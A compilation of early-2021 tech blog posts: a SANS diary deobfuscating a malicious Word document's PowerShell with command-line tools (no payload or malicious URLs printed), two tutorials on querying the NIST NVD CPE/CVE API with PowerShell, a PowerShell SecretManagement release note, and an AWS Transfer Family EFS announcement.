Maldoc Strings Analysis, (Sat, Jan 9th)


As I announced in my diary entry "Strings 2021", I will write some diary entries following a simpler method of malware analysis, namely looking for strings inside malicious files using the strings command. Of course, this simple method will not work for most malware samples, but I still see enough samples for which this method will work.

Like this recent malicious Word document. When you analyze this sample with oledump.py, you will find an obfuscated PowerShell command inside the content of the Word document.

But we are not going to use oledump this time. We will look directly for strings inside the document, using my tool strings.py (similar to the strings command, but with some extra features).

When we run strings.py with option -a on the sample, a report with statistics will be produced:
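
For reference, the invocation looks like this (sample.vir is a hypothetical name for the saved sample):

strings.py -a sample.vir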

We see that strings.py extracted 1549 strings, and that the longest string is more than 15,000 bytes long.

It is unusual for a Word document to contain such a long string. We run strings.py again, now with option -n 15000: this specifies that the minimum length of the strings extracted by strings.py should be 15000 characters. Since there is only one string longer than 15000 characters in this sample, we will see the longest string (and only the longest string, no other strings):
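
The corresponding command (same hypothetical file name):

strings.py -n 15000 sample.vir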

This looks like a BASE64 string (ending with ==), except that there are a lot of repeating characters that are not BASE64 characters: ] and [.

What we have here is obfuscation through repeated insertion of a unique string. I explain this in detail in my diary entry "Obfuscation and Repetition".

]b2[ is probably the string that is inserted over and over again to obfuscate the original string. To be sure, we can use my ad-hoc tool deobfuscate-repetitions.py:
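
In detection mode, the tool just takes the file to scan (a sketch, same hypothetical file name):

deobfuscate-repetitions.py sample.vir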

So the repeating string actually seems to be ]b2[s (appearing 2028 times), and when you remove this repeating string, the string that remains starts with cmd cmd …

My tool deobfuscate-repetitions.py will keep running, looking for other potential repeating strings, but it's clear that we found the correct one here, so we can just stop the tool with control-C.

And now that we used my tool to detect repeating strings, we will use it to deobfuscate the original string. This is done by using option -f (find) to find a deobfuscated string that contains a string we specify, cmd in this example:
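
Based on that description, the command looks like this (a sketch, with sample.vir again a hypothetical name):

deobfuscate-repetitions.py -f cmd sample.vir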

And what we see here is a PowerShell command with a BASE64-encoded script as argument.

If we still had any doubts about whether this document was malicious, this result removes them: the sample is malicious.

And up till now, we didn't use any special tool to look inside the malicious Word document (.doc): just the strings command.

For this sample, you don't need to understand the structure of a Word document, or be familiar with a tool like oledump.py to peek inside it. You just need some familiarity with the command line, and to be able to run the strings command with some options.

If your objective was to determine if this Word document is malicious or not, then you have succeeded. Just by using a strings command.

If your objective was to figure out what this Word document does, then you need to analyze the PowerShell command.

Tomorrow, I will publish a video where I do the full analysis with CyberChef. Here I will continue with command-line tools.

Next, we use my base64dump.py tool to find and decode the BASE64 script:

Like all BASE64-encoded PowerShell scripts passed as an argument, the script is in UNICODE. We use option -t utf16 to transform it to ASCII:
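
Chaining the two steps, something like this pipeline does the job (a sketch: -s 1 assumes the BASE64 script is the first item base64dump.py finds, and -t utf16 is the translation option just mentioned):

deobfuscate-repetitions.py -f cmd sample.vir | base64dump.py -s 1 -t utf16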

What we see here is an obfuscated PowerShell script. When we take a close look, we can see fragments of URLs: strings containing URL fragments are concatenated in this PowerShell script. We will remove the concatenation operator (+) and other characters to reassemble the fragments, using the tr command:

So we start to see some words, like family, but we still need to remove some characters, like the single quote:

And parentheses:
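
Cumulatively, these removals amount to one tr invocation deleting the concatenation operator, single quotes and parentheses (a sketch of the idea):

tr -d "+'()"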

So now we have something that looks like a URL, except that the protocol is not what we expect (HTTP or HTTPS). We can use my tool re-search.py to extract the URLs:
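
re-search.py has a built-in URL regular expression that can be selected by name; a sketch, with the cleaned-up script piped in:

... | re-search.py -n url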

If you want to understand why we have ss and s as protocol, and why @ terminates most URLs, we still need to do some analysis.

First, we use sed to put a newline character after each ; (semicolon), to have each PowerShell statement on a separate line, and make the script more readable:

And then we grep for family to select the line with URLs:
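
Those two steps could look like this (a sketch using GNU sed; script.ps1 is a hypothetical file holding the decoded script):

sed "s/;/;\n/g" script.ps1 | grep family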

Notice here that the protocol of each URL contains string ]b2[s, and that there is a call to method replace to replace this string with string http.

Let's do this with sed ([ and ] have special meaning in the regular expressions used by sed, so we need to escape these characters as \[ and \]):
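
With the brackets escaped, the substitution looks like this (sketch):

sed "s/\]b2\[s/http/g"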

Finally, we have complete URLs. If we use re-search again, to extract the URLs, we get a single line:

This time, re-search is not extracting individual URLs. That's because of the @ character: this is a valid character in URLs, where it is used to prepend credentials to the host (hxxp://username:password@example[.]com). But that is not what is done in this PowerShell script. In this script, there are several URLs, and the separator is the @ character. So we replace the @ character with a newline:
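
Replacing @ with a newline and extracting once more (sketch):

tr "@" "\n" | re-search.py -n url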

And finally, re-search.py gives us a list of URLs:

For this sample, extracting the malicious PowerShell script is quite easy, just using the strings command and a string replacement. Decoding the script to extract IOCs takes more steps, all done with command line tools.

In the next diary entry, I will publish a video showing the analysis of the same sample with CyberChef.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches – Playing with Code (Part 2 of 3), (Fri, Jan 8th)


Building on yesterday's story: now that we have an inventory built in CPE format, let's take an example CVE from that list and write some code. What's in the NVD database (and API) that you can access, then use in your organization?

First, let's play with CVE-2020-24436, which is an Acrobat Reader vulnerability.  In PowerShell, let's construct our query, then from the results pull out all the bits that we're interested in.

$request = "https://services.nvd.nist.gov/rest/json/cve/1.0/CVE-2020-24436"
$cvemetadata = ( (invoke-webrequest $request) | convertfrom-json)

Let's start with the Published Date.  Note again that there's also a "last modified" date – the idea being that if a CVE gets updated, the modified date will reflect that.  Even looking at that briefly, though, that "last modified" date seems to be programmatic, so I think it's getting changed when folks don't intend it – my first check was a PeopleSoft vuln from 2017, and it had a 2020 last modified date for no reason I could see.  Anyway, here's the published date:

$PublishedDate = $cvemetadata.result.cve_items.publishedDate
$PublishedDate

2020-11-05T20:15Z

Next, the text description.  This is where the "traditional" CVE delivery paths fall down – they generally give you the CVE number, then this text description, maybe a severity score.  This is fine for news stories or your report to management, but it's not something you can "monitor" when hundreds of them fly by every day.  Sorry about the rant, but I guess that's why we're playing with this code, so that you can build your own delivery mechanism for your organization.  Anyway, back to the text description:

$CVEDesc = $cvemetadata.result.cve_items.cve.description.description_data.value

$CVEDesc
Acrobat Pro DC versions 2020.012.20048 (and earlier), 2020.001.30005 (and earlier) and 2017.011.30175 (and earlier) are affected by an out-of-bounds write vulnerability that could result in writing past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. This vulnerability requires user interaction to exploit in that the victim must open a malicious document

The Reference URLs that may have more detail (usually there's a vendor URL in this list):

$CVEURLs=$cvemetadata.result.cve_items.cve.references.reference_data.url
$CVEURLs
https://helpx.adobe.com/security/products/acrobat/apsb20-67.html
https://www.zerodayinitiative.com/advisories/ZDI-20-1355/

The data on severity and scope (what we used to call the CVSS score):

$CVE_CVSSv3Data = $cvemetadata.result.CVE_items.impact.basemetricv3.cvssv3
$CVE_CVSSv3Data
version               : 3.1
vectorString          : CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
attackVector          : LOCAL
attackComplexity      : LOW
privilegesRequired    : NONE
userInteraction       : REQUIRED
scope                 : UNCHANGED
confidentialityImpact : HIGH
integrityImpact       : HIGH
availabilityImpact    : HIGH
baseScore             : 7.8
baseSeverity          : HIGH
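
If all you want for a report line is the score and vector, you can flatten those fields into one string (a sketch building on the $cvemetadata object above):

$cvss = $cvemetadata.result.CVE_items.impact.basemetricv3.cvssv3
"{0}: CVSSv3 {1} ({2}) - {3}" -f $cvemetadata.result.cve_items.cve.CVE_data_meta.id, $cvss.baseScore, $cvss.baseSeverity, $cvss.vectorString

which, for this CVE, yields:

CVE-2020-24436: CVSSv3 7.8 (HIGH) - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H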

 

We know what's installed on our affected host, but what versions of the application are affected by this CVE?  Note that this list gives you vulnerable versions ($_.vulnerable = "True") and versions that are not affected ($_.vulnerable = "False").

$CVEAffectedApps=$cvemetadata.result.CVE_items.configurations.nodes.children.cpe_match

$CVEAffectedApps

vulnerable cpe23Uri                                                   versionEndIncluding
---------- --------                                                   -------------------
      True cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*              20.001.30005       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*           17.011.30175       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:continuous:*:*:*        20.012.20048       
      True cpe:2.3:a:adobe:acrobat_reader:*:*:*:*:classic:*:*:*       20.001.30005       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:classic:*:*:*    17.011.30175       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:* 20.012.20048       
     False cpe:2.3:o:apple:mac_os:-:*:*:*:*:*:*:*                                        
     False cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* 

Winnowing this down to just the vulnerable versions:

($cvemetadata.result.CVE_items.configurations.nodes.children.cpe_match) | where {$_.vulnerable -eq "true" }

vulnerable cpe23Uri                                                   versionEndIncluding
---------- --------                                                   -------------------
      True cpe:2.3:a:adobe:acrobat:*:*:*:*:classic:*:*:*              20.001.30005       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:classic:*:*:*           17.011.30175       
      True cpe:2.3:a:adobe:acrobat_dc:*:*:*:*:continuous:*:*:*        20.012.20048       
      True cpe:2.3:a:adobe:acrobat_reader:*:*:*:*:classic:*:*:*       20.001.30005       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:classic:*:*:*    17.011.30175       
      True cpe:2.3:a:adobe:acrobat_reader_dc:*:*:*:*:continuous:*:*:* 20.012.20048       
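
To turn those cpe23Uri values into something more readable, split on the colon separators – in a 2.3-format CPE, fields 4, 5 and 10 are vendor, product and software edition (a sketch):

($cvemetadata.result.CVE_items.configurations.nodes.children.cpe_match) | where {$_.vulnerable -eq "true" } | foreach {
    $f = $_.cpe23Uri -split ':'
    "{0} {1} ({2}) up to and including {3}" -f $f[3], $f[4], $f[9], $_.versionEndIncluding
}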

 

Now with some code written, on Monday we'll string everything together into a useful, complete reporting tool that you can use.

===============
Rob VandenBrink
rob@coherentconsulting.com

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

SecretManagement and SecretStore Release Candidates


The SecretManagement and SecretStore release candidate (RC) modules are now available on the PowerShell Gallery.

The SecretManagement module helps users manage secrets by providing a common set of cmdlets to interface with secrets across vaults. This module supports an extensible model where local and remote vaults can be registered and unregistered for use in accessing and retrieving secrets. SecretStore is a cross-platform local extension vault for use with SecretManagement. We designed this vault as a best attempt at creating a vault that is available where PowerShell is, usable in popular PowerShell scenarios (like automation and remoting) and utilizes common security practices.

For more information on these modules check out these previous blog posts:

Before installing these modules, please uninstall the current preview versions of the modules and restart your PowerShell session.

To install these updates run the following commands:

Uninstall-Module Microsoft.PowerShell.SecretManagement -Force 
Uninstall-Module Microsoft.PowerShell.SecretStore -Force 
# Restart your PowerShell session 
Install-Module -Name Microsoft.PowerShell.SecretManagement -Repository PSGallery 
Install-Module -Name Microsoft.PowerShell.SecretStore -Repository PSGallery 
Register-SecretVault -Name SecretStore -ModuleName Microsoft.PowerShell.SecretStore -DefaultVault -AllowClobber
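
After registering the vault, a quick smoke test confirms that secrets round-trip (the secret name and value here are arbitrary):

Set-Secret -Name TestSecret -Secret "Hello from SecretStore"
Get-Secret -Name TestSecret -AsPlainText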

SecretManagement Updates

  • Register-SecretVault no longer emits error when strict language mode is set
  • Set-DefaultVault cmdlet has been renamed to Set-SecretVaultDefault

General Availability (GA)

This is a “go live” release, which means that we feel that this RC is feature complete and of GA quality. If no bugs are identified through this release, we will increment the versioning and declare the modules as GA in early February. If any high-risk bugs are identified we will continue to release RCs until the quality bar is met for a GA release.

The Extension Vault Ecosystem

To find other SecretManagement extension vault modules, search the PowerShell Gallery for the “SecretManagement” tag. Some community vault extensions that are available:

Thank you to everyone who has created vaults thus far!

Feedback and Support

Community feedback has been essential to the iterative development of these modules. Thank you to everyone who has contributed issues, and feedback thus far! To file issues or get support for the SecretManagement interface or vault development experience please use the SecretManagement repository. For issues which pertain specifically to the SecretStore and its cmdlet interface please use the SecretStore repository.

Sydney Smith

PowerShell Team

 

The post SecretManagement and SecretStore Release Candidates appeared first on PowerShell.

New – AWS Transfer Family support for Amazon Elastic File System


AWS Transfer Family provides fully managed Secure File Transfer Protocol (SFTP), File Transfer Protocol (FTP) over TLS, and FTP support for Amazon Simple Storage Service (S3), enabling you to seamlessly migrate your file transfer workflows to AWS.

Today I am happy to announce AWS Transfer Family now also supports file transfers to Amazon Elastic File System (EFS) file systems as well as Amazon S3. This feature enables you to easily and securely provide your business partners access to files stored in Amazon EFS file systems. With this launch, you now have the option to store the transferred files in a fully managed file system and reduce your operational burden, while preserving your existing workflows that use SFTP, FTPS, or FTP protocols.

Amazon EFS file systems are accessible within your Amazon Virtual Private Cloud (VPC) and VPC connected environments. With this launch, you can securely enable third parties such as your vendors, partners, or customers to access your files over the supported protocols at scale globally, without needing to manage any infrastructure. When you select Amazon EFS as the data store for your AWS Transfer Family server, the transferred files are readily available to your business-critical applications running on Amazon Elastic Compute Cloud (EC2), as well as to containerized and serverless applications run using AWS services such as Amazon Elastic Container Service (ECS), Amazon Elastic Kubernetes Service (EKS), AWS Fargate, and AWS Lambda.

Using Amazon EFS – Getting Started
To get started in your existing Amazon EFS file system, make sure the POSIX identities you assign for your SFTP/FTPS/FTP users are owners of the files and directories you want to provide access to. You will provide access to that Amazon EFS file system through a resource-based policy. Your IAM role also needs to establish a trust relationship. This trust relationship allows AWS Transfer Family to assume the AWS Identity and Access Management (IAM) role to access your file system so that it can service your users’ file transfer requests.
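
For reference, the trust relationship follows the standard service-role pattern; a minimal trust policy document that lets Transfer Family assume the role looks like this:

{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Principal": { "Service": "transfer.amazonaws.com" },
      "Action": "sts:AssumeRole"
    }
  ]
}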

You will also need to make sure you have created a mount target for your file system. In the example below, the home directory is owned by userid 1234 and groupid 5678.

$ mkdir home/myname
$ chown 1234:5678 home/myname

When you create a server in the AWS Transfer Family console, select Amazon EFS as your storage service in the Step 4 section Choose a domain.

When the server is enabled and in an online state, you can add users to your server. On the Servers page, select the check box of the server that you want to add a user to and choose Add user.

In the User configuration section, you can specify the username, uid (e.g. 1234), gid (e.g. 5678), IAM role, and the Amazon EFS file system as the user’s home directory. You can optionally specify a directory within the file system which will be the user’s landing directory. You use a service-managed identity type – SSH keys. If you want to use the password type, you can use a custom option with AWS Secrets Manager.

Amazon EFS uses POSIX IDs which consist of an operating system user id, group id, and secondary group id to control access to a file system. When setting up your user, you can specify the username, user’s POSIX configuration, and an IAM role to access the EFS file system. To learn more about configuring ownership of sub-directories in EFS, visit the documentation.

Once the users have been configured, you can transfer files using the AWS Transfer Family service by specifying the transfer operation in a client. When your user authenticates successfully using their file transfer client, they will be placed directly within the specified home directory, or the root of the specified EFS file system.

$ sftp myname@my-efs-server.example.com

sftp> cd /fs-23456789/home/myname
sftp> ls -l
-rw-r--r-- 1 3486 1234 5678 Jan 04 14:59 my-file.txt
sftp> put my-newfile.txt
sftp> ls -l
-rw-r--r-- 1 3486 1234 5678 Jan 04 14:59 my-file.txt
-rw-r--r-- 1 1002 1234 5678 Jan 04 15:22 my-newfile.txt

Most SFTP/FTPS/FTP commands are supported on the new EFS file system. You can refer to a list of available commands for FTP and FTPS clients in the documentation.

Command Amazon S3 Amazon EFS
cd Supported Supported
ls/dir Supported Supported
pwd Supported Supported
put Supported Supported
get Supported Supported including resolving symlinks
rename Supported (only file) Supported (file or folder)
chown Not supported Supported (root only)
chmod Not supported Supported (root only)
chgrp Not supported Supported (root or owner only)
ln -s Not supported Not supported
mkdir Supported Supported
rm Supported Supported
rmdir Supported (non-empty folders only) Supported
chmtime Not Supported Supported

You can use Amazon CloudWatch to track your users’ activity for file creation, update, delete, read operations, and metrics for data uploaded and downloaded using your server. To learn more on how to enable CloudWatch logging, visit the documentation.

Available Now
AWS Transfer Family support for Amazon EFS file systems is available in all AWS Regions where AWS Transfer Family is available. There are no additional AWS Transfer Family charges for using Amazon EFS as the storage backend. With Amazon EFS storage, you pay only for what you use. There is no need to provision storage in advance and there are no minimum commitments or up-front fees.

To learn more, take a look at the FAQs and the documentation. Please send feedback to the AWS forum for AWS Transfer Family or through your usual AWS support contacts.

Learn all the details about AWS Transfer Family to access Amazon EFS file systems and get started today.

Channy;

Using the NIST Database and API to Keep Up with Vulnerabilities and Patches (Part 1 of 3), (Thu, Jan 7th)


It's been a while since NIST changed the API for their NVD (National Vulnerability Database), so I (finally) got around to writing some code against that API.  This API gives you a way for your code to query CVEs (Common Vulnerabilities and Exposures) against a broad range of products (or against specific products).  What this immediately brought to my mind was what I always ask my clients to put in someone's job description: "monitor vendor announcements and industry news for vulnerabilities in the products in use by the organization".  This can be a tough row to hoe, especially if we're not talking the Microsoft / Cisco / Oracle and other "enterprise flagship" products – the ones that might immediately come to mind – if you monitor the CVE list you'll see dozens or hundreds of CVEs scroll by in a day.  Subscribing to all the vendor security newsgroups and feeds can also quickly turn into a full-time proposition.  I think using the NIST API can be a viable alternative to just plain "keeping up".  CVEs often are a few days behind vendor announcements and patches, but on the other hand the CVE database is a one-stop shop: (theoretically) everything is posted here.

In most cases I'd expect a hybrid approach – monitor industry news and vendor sources for your "big gun" applications, and then query this database for everything (to catch smaller apps and anything missed on your list of major apps).

First of all, in this API products are indexed by "CPE" (Common Platform Enumeration), a structured naming convention.  Let's see how this works – first, let's query the CPE database to get the NVD representation of the products that you have in your organization.  You can do this iteratively.

For instance, to get PeopleSoft versions, start by querying Oracle products:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle

Then narrow it down with the info you find in that search to get PeopleSoft.  

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle:peoplesoft_enterprise

As you can see, you can narrow this down further by version:

https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:a:oracle:peoplesoft_enterprise:8.22.14

.. however you might also want to leave that a bit open – you don't want to be in the position where your Operations team has updated the application but maybe didn't tell the security team or the security developer team (that'd be you).
(Or the dev-sec-dev-devops or whatever we're calling that these days :-))
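
These browser queries can of course be scripted, too; a PowerShell sketch (the result property names here, result.cpes and cpe23Uri, are assumptions based on the API docs):

$request = "https://services.nvd.nist.gov/rest/json/cpes/1.0?cpeMatchString=cpe:2.3:*:oracle:peoplesoft_enterprise"
((invoke-webrequest $request) | convertfrom-json).result.cpes.cpe23Uri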

Repeat this process for everything in your organization's flock of applications and Operating Systems.  As with all things of this type, of course test with one or three applications/CPEs, then grow your list over time.  You can use our previous diary on collecting hardware and software inventories (CIS Critical Controls 1 and 2) – code for these is here:
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC01
https://github.com/robvandenbrink/Critical-Controls/tree/master/CC02

Full docs for the CPE API are here:
https://csrc.nist.gov/publications/detail/nistir/7696/final
https://csrc.nist.gov/CSRC/media/Projects/National-Vulnerability-Database/documents/web%20service%20documentation/Automation%20Support%20for%20CPE%20Retrieval.pdf

So how do we translate from a "real" inventory as reported by Windows WMI or PowerShell to what the CPE API expects?  The short answer is "the hard way" – we hit each application, one by one, and do an "it looks sorta like this" query.  The NVD gives us a handy page to do this in – for a manual task like this I find the website to be quicker than the API.
First, navigate to https://nvd.nist.gov/products/cpe/search/

Then, put in your application name, vendor name, or any substring of those.

For instance, putting in "AutoCad" gives you 4 pages of various versions and application "bolt-ons" (or "toolsets" in autocad-speak).  It's interesting that the versioning convention is not standard, not even in this single first product example.
Some versions are named as "autocad:2010", and some are named as "autodesk:autocad_architecture_2009"
What you'll also find in this exploration is that "AutoCad version 2020" is actually version "24.0" as reported by the Windows interfaces – some of this oddness creeps into the CPE database as well.

Looking at a few apps that are more commonly used, let's look at the Adobe and FoxIT PDF readers.

To get all current-ish versions of FoxIT reader, we'll look for 10.0 and 10.0.1; these boil down to:

cpe:2.3:a:foxitsoftware:foxit_reader:10.*

This query gives us a short list:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.0.35798:*:*:*:*:*:*:*
cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.35811:*:*:*:*:*:*:*

For our final list, we'll modify that last one to catch future sub-versions of 10.0.1, as:

cpe:2.3:a:foxitsoftware:foxit_reader:10.0.1.*

Looking for Adobe Reader DC version 19 and 20, we end up with:

cpe:2.3:a:adobe:acrobat_reader_dc:19.*
cpe:2.3:a:adobe:acrobat_reader_dc:20.*

This all looks straightforward, except that when you look at a few versions of 20, it looks like:

cpe:2.3:a:adobe:acrobat_reader_dc:20.009.20074:*:*:*:continuous:*:*:*
cpe:2.3:a:adobe:acrobat_reader_dc:20.001.30002:*:*:*:classic:*:*:*

So you'd think a properly formed query for version 20/classic would look like:
cpe:2.3:a:adobe:acrobat_reader_dc:20.*.*:*:*:*:classic:*:*:* – but no, that doesn't work

So you see, there's a bit of back-and-forth for each one – for each of my clients I tend to put an afternoon aside to turn their software inventory into a "CPE / CVE friendly" inventory.
You can speed this process up by downloading the entire CPE dictionary and "grep" through it for what you need: https://nvd.nist.gov/products/cpe
Just using grep, you can now relate your software inventory back to the CPE dictionary much more easily – for instance:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i office
    <title xml:lang="en-US">Avery Wizard For Microsoft Office Word 2003 2.1</title>
    <title xml:lang="en-US">Microsoft BackOffice</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.0</title>
    <title xml:lang="en-US">Microsoft BackOffice 4.5</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit</title>
    <title xml:lang="en-US">Microsoft backoffice_resource_kit 2.0</title>
    <title xml:lang="en-US">Microsoft Office Excel 2002 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2003 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 2</title>
    <title xml:lang="en-US">Microsoft Office Excel 2007 Service Pack 3</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office Excel 2010 Service Pack 2 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5 (Office 2000)</title>
    <title xml:lang="en-US">Microsoft Internet Explorer 5.01 (Office 2000 SR-1)</title>
    <title xml:lang="en-US">Microsoft Office</title>
    <title xml:lang="en-US">Microsoft Office 3.0</title>
    <title xml:lang="en-US">Microsoft Office 4.0</title>
    <title xml:lang="en-US">Microsoft Office 4.3</title>
    <title xml:lang="en-US">Microsoft Office 95</title>
    <title xml:lang="en-US">Microsoft Office 97</title>
    < … more older versions .. >
    <title xml:lang="en-US">Microsoft Office 2013</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    <title xml:lang="en-US">Microsoft Office 2013 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 x86 (32-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 on X86</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT SP1</title>
    <title xml:lang="en-US">Microsoft Office 2013 Service Pack 1 RT Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 for MacOS</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R)</title>
    <title xml:lang="en-US">Microsoft Office 2016 Click-to-Run (C2R) x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Office 2016 MacOS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2016 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2016</title>
    <title xml:lang="en-US">Microsoft Office 2019</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x64</title>
    <title xml:lang="en-US">Microsoft Office 2019 on x86</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS</title>
    <title xml:lang="en-US">Microsoft Office 2019 for Mac OS X</title>
    <title xml:lang="en-US">Microsoft Office 2019 for macOS</title>
    <title xml:lang="en-US">Microsoft Office 2019 Mac OS Edition</title>
    <title xml:lang="en-US">Microsoft Office 2013 RT</title>
    < and so on … >

You can see this list relates much better to your "actual" inventory as reported by more "traditional" means (WMI / Powershell).  
Now refine this list, relating the results back to your real inventory.  Sorry, since the "match" on the title isn't always exact, this again usually involves some manual components.  Even mainstream products don't always have a match.

For instance, looking for MS Project 2013:
From our cross-domain software inventory (in PowerShell) we have:

> $domainapps.name | grep "Project"
Microsoft Project MUI (English) 2013
Microsoft Project Professional 2013

And from the CPE Dictionary:

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i project | grep 2013
    <title xml:lang="en-US">Microsoft Project 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Project Server 2013 Service Pack 1 (x64) 64-bit</title>

So a match, but not exact.

Another illustration – even MS Word there isn't an exact match, in almost every case we're either picking a few CPE's or guesstimating for the closest one:

> $domainapps.name | grep "Word"
Microsoft Word MUI (English) 2013

>type official-cpe-dictionary_v2.3.xml | grep -i title | grep -i microsoft | grep -i word | grep 2013
    <title xml:lang="en-US">Microsoft Word 16.0.11425.20132 for Android</title>
    <title xml:lang="en-US">Microsoft Word 2013</title>
    <title xml:lang="en-US">Microsoft Word 2013 RT Edition</title>
    <title xml:lang="en-US">Microsoft Word 2013 for Microsoft Windows RT</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 x64 (64-bit)</title>
    <title xml:lang="en-US">Microsoft Word 2013 Service Pack 1 on x86</title>
    <title xml:lang="en-US">Microsoft Word 2013 SP1 RT</title>
    <title xml:lang="en-US">Microsoft Word RT 2013 Service Pack 1</title>

 

Where this plays well for me is if I exclude Windows and Office – for those, just using Windows Update (or your WSUS, SCCM or whatever patch manager you use) and then auditing the "last updated" date for Windows tends to catch things really well.  It's the MS server apps – Exchange, SQL and so on – and everything that isn't Microsoft where this method really helps turn the flood of CVE information into a once-a-week summary that you can use.

 

As you'd expect, if you are in a niche industry, you may not find all of your applications – for instance ICS clients and Banking clients may not find their user-facing main business applications in the CPE list, and sadly will never see CVEs to keep their vendors honest.

In a welcome recent development, as I was writing this article I noticed that if your application has a listening port, nmap will make a reasonably good estimate of what that application is with the -sV option (probe open ports to determine service/version info).  In the example below, nmap very nicely inventories my ESXi 7.0 server, and gives me the exact CPE for it:

C:\>nmap -sV -p 443 --open 192.168.122.51
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-06 18:45 Eastern Standard Time
Nmap scan report for 192.168.122.51
Host is up (0.0011s latency).

PORT    STATE SERVICE   VERSION
443/tcp open  ssl/https VMware ESXi SOAP API 7.0.0
MAC Address: 00:25:90:CB:00:18 (Super Micro Computer)
Service Info: CPE: cpe:/o:vmware:ESXi:7.0.0

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 145.70 seconds

Now, with your software inventory complete and your CPE strings in hand, you can start querying for CVE's!

Sticking with our Acrobat and FoxIT examples, we can search for all CVEs – to do this we'll change the API URI slightly; all the URI conventions stay consistent:

https://services.nvd.nist.gov/rest/json/cves/1.0?cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Now things start to look interesting! Of course, given our search this gets us a boatload of CVEs.  Let's look for the last 60-ish days – we'll query for anything modified since Nov 1, 2020:

https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*

Keep in mind that there are a few dates involved – the publishedDate and the lastModifiedDate.  While the NVD examples typically go after "last modified", I've seen CVEs from the mid-2000s with a "last modified" date in 2019 – so be careful.  Normally I'm querying using "publishedDate".

Again, rinse and repeat for all of your CPE's collected.  We're still playing in the browser, but you can see it's a simple query, and the return values are in JSON, so things look simple.  Except that as things nest and nest, what looks simple on the screen isn't necessarily simple in code.  For instance, to get the CVE numbers for the Acrobat Reader DC 20 query above, the PowerShell code looks like:

$request = "https://services.nvd.nist.gov/rest/json/cves/1.0?modStartDate=2020-11-01T00:00:00:000%20UTC-05:00&cpeMatchString=cpe:2.3:a:adobe:acrobat_reader_dc:20.*"
$CVES = (invoke-webrequest $request | ConvertFrom-Json).result.CVE_items.cve.CVE_data_meta.id
$CVES

CVE-2020-24439
CVE-2020-24438
CVE-2020-24436
CVE-2020-24434
CVE-2020-24426
CVE-2020-24437
CVE-2020-24435
CVE-2020-24433
CVE-2020-24432
CVE-2020-24431
CVE-2020-24430
CVE-2020-24429
CVE-2020-24428
CVE-2020-24427
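
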